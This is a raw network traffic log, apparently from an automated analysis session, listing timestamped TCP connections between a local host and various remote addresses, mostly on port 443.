Sep 26, 2024 17:55:32.026444912 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:32.026453018 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.026695013 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.028017998 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:32.075402021 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.100929976 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.100969076 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.101080894 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.103102922 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.103116989 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.122953892 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123020887 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123079062 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123287916 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.123306990 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123347998 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123501062 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.123672009 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.124691010 CEST	49796	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.124701023 CEST	443	49796	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.128258944 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.128339052 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.128400087 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.128433943 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.130855083 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.135067940 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.135096073 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.135250092 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.135989904 CEST	49795	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.135996103 CEST	443	49795	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.136020899 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.136033058 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.208360910 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.211944103 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.211973906 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.212356091 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.213824987 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.214299917 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.214308977 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.214724064 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.214724064 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.214771032 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.214835882 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.217267990 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.217364073 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.221620083 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.221620083 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.221649885 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.221709967 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.261018991 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.275243044 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.275252104 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.307415962 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:32.323324919 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.383677959 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.383738995 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.383836985 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:32.384691954 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:32.384713888 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.384746075 CEST	49797	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:32.384752035 CEST	443	49797	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:32.414372921 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.414521933 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.414597988 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.415117979 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.415134907 CEST	443	49798	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.415158987 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.415205002 CEST	49798	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.423079967 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.423172951 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.423249006 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.424314976 CEST	49799	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.424325943 CEST	443	49799	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.484205008 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.484674931 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.484715939 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.485104084 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.485130072 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.485544920 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.485618114 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.486046076 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.486073017 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.486663103 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.486711979 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.486799002 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.487762928 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.487890959 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.488085985 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.488168001 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.488471985 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.488480091 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.530201912 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.531414986 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.756417990 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.756465912 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.756519079 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.756541967 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.757111073 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.757188082 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.757473946 CEST	49801	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.757489920 CEST	443	49801	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.774002075 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.774295092 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.774307013 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.774758101 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.775082111 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.775165081 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.775228977 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.775240898 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.781681061 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.781927109 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.781935930 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.782213926 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.782668114 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.782725096 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.782852888 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:32.787223101 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.787265062 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.787312984 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.787337065 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.787995100 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.788033962 CEST	443	49802	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:32.788098097 CEST	49802	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:32.817210913 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.827400923 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:32.913203001 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:32.977318048 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.977396965 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:32.977478027 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.978089094 CEST	49803	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:32.978110075 CEST	443	49803	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:33.054603100 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.054653883 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.054686069 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.054707050 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:33.054719925 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.054732084 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.054778099 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:33.055114031 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.055182934 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:33.055764914 CEST	49804	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:33.055779934 CEST	443	49804	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:33.137201071 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:34.123251915 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:35.105792999 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.105834007 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.106003046 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.106545925 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.106556892 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.229641914 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.229734898 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.229835033 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.230201960 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.230257988 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.230345964 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.230690956 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.230704069 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.303738117 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:35.303778887 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:35.303916931 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:35.304668903 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:35.304688931 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:35.544197083 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.544261932 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.544354916 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.758635044 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.758929968 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.758953094 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.759625912 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.760006905 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.760087967 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.760196924 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:35.760298014 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:35.785614967 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.785716057 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.786346912 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.786395073 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.807121992 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.807138920 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.807302952 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:35.807311058 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.807518005 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:35.807581902 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.122117996 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.122143030 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.122241974 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.122260094 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.122272015 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.122286081 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:36.122298956 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.122342110 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.122380972 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:36.122448921 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:36.122905016 CEST	49805	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:36.122925043 CEST	443	49805	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:36.123996973 CEST	49806	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.124016047 CEST	443	49806	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.129363060 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.129390955 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.129491091 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.129833937 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.129846096 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.148226976 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.148231030 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.148243904 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.246062040 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:36.246378899 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:36.246414900 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:36.246484995 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:36.246718884 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:36.246731997 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:36.302928925 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.303009033 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.316420078 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.316437960 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.316978931 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.317408085 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.317497015 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.317570925 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.466681004 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:36.530211926 CEST	49678	443	192.168.2.16	20.189.173.10
Sep 26, 2024 17:55:36.609181881 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:36.646409988 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.646511078 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.649527073 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.649533033 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.649672031 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.649678946 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.649916887 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.650298119 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.695884943 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.695919037 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.695977926 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.695987940 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.696052074 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.696263075 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.696285963 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.696309090 CEST	49807	443	192.168.2.16	40.126.32.68
Sep 26, 2024 17:55:36.696315050 CEST	443	49807	40.126.32.68	192.168.2.16
Sep 26, 2024 17:55:36.716912985 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.716939926 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.716957092 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.716973066 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.717032909 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717056990 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717262030 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717277050 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.717308998 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717320919 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.717339993 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717366934 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.717458963 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717642069 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:36.717653036 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:36.767210960 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:36.877851009 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.877873898 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.877892971 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.877916098 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.877929926 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.877986908 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.878034115 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.878041029 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.878046036 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.878083944 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.878084898 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.878144979 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.879478931 CEST	49808	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.879489899 CEST	443	49808	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.882441044 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.882483006 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:36.882662058 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.882849932 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:36.882864952 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.055979013 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.056071043 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.066387892 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.066401005 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.066698074 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.068423033 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.068816900 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.068907022 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.068911076 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.146044016 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.146106005 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.146244049 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.146490097 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.146507025 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.248836040 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.249243021 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.249284029 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.249355078 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.249716043 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.249727011 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.272500038 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.272558928 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.272651911 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.272684097 CEST	443	49809	51.104.15.253	192.168.2.16
Sep 26, 2024 17:55:37.272783995 CEST	49809	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.315856934 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.315928936 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.316359997 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.316368103 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.316597939 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.316605091 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.325215101 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:37.326334000 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.326394081 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.326739073 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.326780081 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.326791048 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.326821089 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.327028036 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.327034950 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.327171087 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.327181101 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.327289104 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.327295065 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.357218981 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.357228041 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.357978106 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.373218060 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:37.407589912 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.407660007 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.408116102 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.408123970 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.408330917 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.408337116 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.466424942 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.466465950 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.466507912 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.466532946 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.466561079 CEST	49812	443	192.168.2.16	204.79.197.200
